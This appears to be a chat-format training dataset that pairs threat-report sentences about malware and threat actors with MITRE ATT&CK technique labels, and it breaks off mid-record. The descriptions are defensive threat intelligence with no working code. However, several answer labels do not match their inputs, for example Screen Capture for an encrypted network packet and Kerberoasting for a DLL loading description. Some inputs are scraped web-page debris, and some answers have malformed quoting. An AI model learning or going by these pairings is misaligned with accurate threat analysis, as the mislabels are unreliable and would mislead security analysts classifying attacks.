- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LitePower can identify installed AV software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson can use a module to perform keylogging on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk."
- },
- {
- "role": "assistant",
- "content": "T1027.006 - HTML Smuggling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clears Windows PowerShell and WitnessClientAdmin log file."
- },
- {
- "role": "assistant",
- "content": "T1070.003 - Indicator Removal on Host: Clear Command History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can track key presses with a keylogger module."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "checks if the victim OS is 32 or 64-bit."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoxCaon has used Windows API calls to obtain information about the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "dsquery can be used to gather information on permission groups within a domain."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to index files from drives, user profiles, and removable drives."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN can search, read, write, move, and execute files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can clear possible malware traces such as application logs."
- },
- {
- "role": "assistant",
- "content": "T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has obtained the password for the victim's password manager via a custom keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "[Screenshot 1] Encrypted Login Packet sent by Gh0stRAT infected PC In addition to a standard malware analysis blog post, I’d also like to take this time to document and describe my methods for analysis, in the hopes that you as a reader will use these techniques in the future"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "mimics a legitimate Russian program called USB Disk Security."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates using HTTPS and uses a custom encryption cipher to encrypt the HTTPS message body."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A service DLL (loaded by svchost.exe) with a ServiceMain function typically named NetSetupServiceMain - A standard non-Service DLL loaded by rundll32.exe"
- },
- {
- "role": "assistant",
- "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook has been launched by starting iexplore.exe and replacing it with Bandook's payload."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has used Mimikatz and a custom tool, SecHack, to harvest credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may enumerate user directories on a victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD has used HTTP for communications with command and control (C2) servers."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CTU researchers assess with high confidence that IRON RITUAL's intent is long term, covert access to networks of interest for the purposes of espionage and data theft.ToolsTaegis™ XDR Adversary Software Coverage Tool"
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY has hashed most its code's functions and encrypted payloads with base64 and XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This task is executed every 25 minutes and will repeat the actions described above – recreating the JavaScript code which later will create and execute a PowerShell script (described below)"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All this data is merged in one file xmlrwbin.inc, which is then encrypted with RC4. To be able to decipher the data, the attacker should certainly know either the MD5 hash or the whole buffer content. This data is also sent, but RSA encrypted. The malware constructs a 1120 bit public key, uses it to encrypt the 117-bytes buffer. The malware then concatenates all the data to be sent as a 128-bytes block. The resulting data is saved in C:Program FilesCommon FilesSystemOle DB to a file named according to the following format"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBK has the ability to inject shellcode into svchost.exe."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can identify installed security tools based on window names."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can use a modified base32 encoding to encode data within the subdomain of C2 requests."
- },
- {
- "role": "assistant",
- "content": "T1132.002 - Non-Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 has used brute force techniques to obtain credentials."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can´t prove they were related to this particular attack"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The implant receives HTTP-based commands from a control server and parses the HTTP Content-Type and Content-Length from the HTTP header. If the HTTP Content-Type matches the following value, then the implant executes the command specified by the control server"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. Gamaredon has used, maintained and updated development of this code for years. Its code contains anti-detection functions specifically designed to identify sandbox environments in order to thwart antivirus detection attempts"
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM has used PsExec to move laterally between hosts in the target network."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used stolen credentials to copy tools into the \"%TEMP%\" directory of domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ragnar Locker has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerDuke uses rundll32.exe to load."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In older versions, Valak downloads the second stage JS and uses only one obfuscation technique: Base64. The newer versions use XOR in addition to Base64"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT30 has relied on users to execute malicious file attachments delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UnionCryptoUpdater.exe does not immediately download the stage 2 malware but instead downloads it after a time specified by the C2 server. This delay could be implemented to prevent researchers from directly obtaining the stage 2 malware"
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The functional payload is a DLL compiled on 2019-03-11 02:23:54, which has two functionalities depending if the binary has a command line argument -daemon or -worker passed to it. The daemon functionality handles the C2 communications portion of the Trojan, which is configured to communicate with 185.12.45[.]134 over HTTPS using the following URL"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet enumerates the directories of a network resource."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Similar to Reaver as posted by Palo Alto, it gets the IP or domain of the C&C server, the port, name of the binary, a sleep timer, and what Palo Alto calls a “campaign identifier.” Technical Details At this moment, we were unable to retrieve the original infection vector and other information regarding what other tools the APT15 group is using to attack their targets"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Summary . The following knowledgebase will explain the uses of Net commands in Windows Operating Systems. More information . Net Commands On Windows Operating Systems . The following Net Commands can be used to perform operations on Groups, users, account policies, shares, and so on. NET . The \"Net Accounts\" command is used to set the policy settings on local computer, such as Account policies and password policies. This command can't be used on domain controller. When you type Net Accounts, you will see the default settings of the Account Lockout policy and Password Policy in local computer show as: The above settings displayed as per the role of the computer. Community Solutions Content Disclaimer . Microsoft corporation and/or its respective suppliers make no representations about the suitability, reliability, or accuracy of the information and related graphics contained herein. User Account Control and remote restrictions - Windows Server Describes User Account Control (UAC) and remote restrictions in Windows Vista. auditpol get Reference article for the auditpol get command, which retrieves the system policy, per-user policy, auditing options, and audit security descriptor object. wevtutil Reference article for wevtutil, which lets you retrieve information about event logs and publishers. Manage cookies - Previous Version Docs - Blog - Contribute - Privacy & Cookies - Terms of Use - Trademarks - © Microsoft 2022 - Summary - More information - - - - Manage cookies - Previous Version Docs - Blog - Contribute - Privacy & Cookies - Terms of Use - Trademarks - © Microsoft 2022"
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can launch an instance of itself with administrative rights using runas."
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Even more, this tiny bootkit with a size of only 80 kb on disk after installation can disable built-in Windows security protection such as Hypervisor-Protected Code Integrity (HVCI) and Windows Defender and bypass User Account Control (UAC)."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IceApple .NET assemblies have used `App_Web_` in their file names to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the cases where Sakula does not use a registry key for persistence, it attempts to set itself up as a service (see Table 2). It invokes itself by calling WinExec with the \"net start %s\" argument (without quotes), where \"%s\" is the service name"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used various tools (such as Mimikatz and WCE) to perform credential dumping."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can steal clipboard contents."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another interesting discovery was a tool that was used during attacks to make queries to Active Directory using LDAP. This tool is able to dump detailed information about computers and usernames listed in Active Directory, and is tailored for a specific victim’s domain"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery', 'T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On October 31, TA505 sent two campaigns, both using .lnk files embedded in Microsoft Word documents. As shown in Figure 4, recipients must open the attached Word document, enable editing, and then execute the .lnk file by double clicking an image in the document. They must further confirm that they want to open the .lnk file (Figure 5), which, in turn, downloads an intermediate downloader. Despite the number of steps involved, TA505 relies on light social engineering in the email and lure as well as end user conditioning to proceed through the scheme and infect their PC with malware"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar has used XOR, RSA2, and RC4 encrypted files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell can capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fine-tuning DaserfOur analyses revealed Daserf regularly undergo technical improvements to keep itself under the radar against traditional anti-virus (AV) detection. Daserf 1.72 and later versions use the alternative base64+RC4 to encrypt the feedback data, while others use different encryption such as 1.50Z, which uses the Ceasar cipher (which substitutes letters in plaintext with another that corresponds to a number of letters, either upwards or downwards"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing', 'T1027.005 - Indicator Removal from Tools', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 obtained information about the configured Exchange virtual directory using \"Get-WebServicesVirtualDirectory\"."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pandora has the ability to gain system privileges through Windows services."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "added newly created accounts to the administrators group to maintain elevated access."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 can create new users through Azure AD."
- },
- {
- "role": "assistant",
- "content": "T1136.003 - Create Account: Cloud Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can enumerate connected remote logical drives."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to delete local files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amadey has decoded antivirus name strings."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POORAIM has used AOL Instant Messenger for C2."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
